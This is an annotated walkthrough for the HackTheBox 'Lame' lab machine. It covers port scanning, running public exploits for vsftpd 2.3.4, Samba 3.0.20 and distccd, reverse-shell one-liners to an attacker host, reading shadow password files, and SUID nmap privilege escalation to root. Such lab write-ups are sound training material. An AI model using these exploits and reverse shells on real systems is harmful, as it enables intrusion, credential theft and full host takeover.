HackTheBox: Lame

  1. Port Scan
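# --- Port scan ---------------------------------------------------------------
# -Pn skips host discovery (ICMP is commonly filtered on lab hosts). The first
# pass uses nmap's default port list; the second (-p-) walks all 65535 ports.
nmap -Pn <ip>
nmap -Pn -p- <ip>
# Version/OS detection plus default scripts (-A). Note "-p-3632" is the RANGE
# 1-3632, not the single port 3632: it covers every port the full scan found,
# distcc on 3632 included. Use "-p 3632" if only that service is wanted.
nmap -A -p-3632 <ip>
# The "vuln" script category is slow and noisy and includes intrusive checks;
# fine against a lab target, reconsider against anything production-adjacent.
nmap --script vuln <ip>
# SMB share and user enumeration on 445 via NSE (no credentials supplied).
nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse <ip>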
  2. FTP / SMB / distcc
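# --- FTP (21) ----------------------------------------------------------------
# Interactive session; "ls" is typed inside it once logged in. The version in
# the banner is presumably what feeds the searchsploit query that follows.
ftp <ip>
ls
searchsploit vsftpd
# Third-party exploit for the vsftpd 2.3.4 backdoor. This is someone else's
# code fetched from "master": read it before you run it, and prefer pinning the
# URL to a commit hash so the file you reviewed is the file you execute.
wget https://raw.githubusercontent.com/In2econd/vsftpd-2.3.4-exploit/master/vsftpd_234_exploit.py
less vsftpd_234_exploit.py
# <port> is presumably the FTP port (21). Start with a harmless "whoami" to
# confirm execution before sending anything heavier.
python3 vsftpd_234_exploit.py <ip> <port> whoami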
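# --- SMB (139/445) -----------------------------------------------------------
# Anonymous share access; -N suppresses the password prompt. Use the <ip>
# placeholder like the rest of the walkthrough instead of a hard-coded lab IP.
smbclient -N //<ip>/anonymous
# Third-party exploit for the Samba 3.0.20 version found during enumeration.
# Unreviewed code from a random repo is itself a risk: read it first, and pin
# the URL to a commit rather than "master".
wget https://raw.githubusercontent.com/macha97/exploit-smb-3.0.20/master/exploit-smb-3.0.20.py
less exploit-smb-3.0.20.py
# Reverse-shell payload emitted as a Python string (-f python), presumably to
# be pasted into the exploit script (the walkthrough does not show where).
# LHOST must be the ATTACKER's address — the original used the target's.
msfvenom -p cmd/unix/reverse_netcat LHOST=<attacker ip> LPORT=1234 -f python
# Listener first, then fire the exploit; -n avoids reverse-DNS lookups.
nc -lvnp 1234
python exploit-smb-3.0.20.py
# In the shell that connects back:
id
python -c 'import pty;pty.spawn("/bin/bash");'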
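# --- distcc (3632) -----------------------------------------------------------
searchsploit distcc
# Third-party PoC for the distccd RCE (CVE-2004-2687). The gist URL is already
# pinned to a revision — still read the script before running it.
wget https://gist.githubusercontent.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855/raw/48ab4eb0bd69cac67bc97fbe182e39e5ded99f9f/distccd_rce_CVE-2004-2687.py
less distccd_rce_CVE-2004-2687.py
# The downloaded file is distccd_rce_CVE-2004-2687.py; the original text
# invoked "CVE-0224-2687.py", which does not exist. Prove execution with
# "whoami" before pushing a shell.
python distccd_rce_CVE-2004-2687.py -t <ip> -p 3632 -c whoami
# Listener, then EITHER of the two reverse-shell one-liners (bash /dev/tcp or
# nc -e — whichever the target supports). The shell this gives is the one the
# privilege-escalation steps start from.
nc -lvnp 1234
python distccd_rce_CVE-2004-2687.py -t <ip> -p 3632 -c 'bash -i >& /dev/tcp/<attacker ip>/1234 0>&1'
python distccd_rce_CVE-2004-2687.py -t <ip> -p 3632 -c 'nc -e /bin/sh <attacker ip> 1234'
id
python -c 'import pty;pty.spawn("/bin/bash");'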
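# --- Privilege escalation (from the distcc shell) ----------------------------
ls -l /etc/passwd
sudo -l
# /etc/shadow is normally root-only; when that cat fails, look for readable
# copies elsewhere — the walkthrough finds one at /var/backups/shadow.bak.
cat /etc/shadow
find / 2>/dev/null | grep "shadow"
cat /var/backups/shadow.bak
# SUID binaries. Must be "-type f"; the original "-type -f" is rejected by find.
find / -perm -u=s -type f 2>/dev/null
# Old nmap builds ship an interactive mode whose "!sh" escape spawns a shell;
# with nmap SUID root that shell is root. Two steps: run nmap, then type "!sh"
# at its prompt (the original text had them fused on one line).
nmap --interactive
!sh
id
whoami
cd /home/makis
cat user.txt
cd /root
cat root.txt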
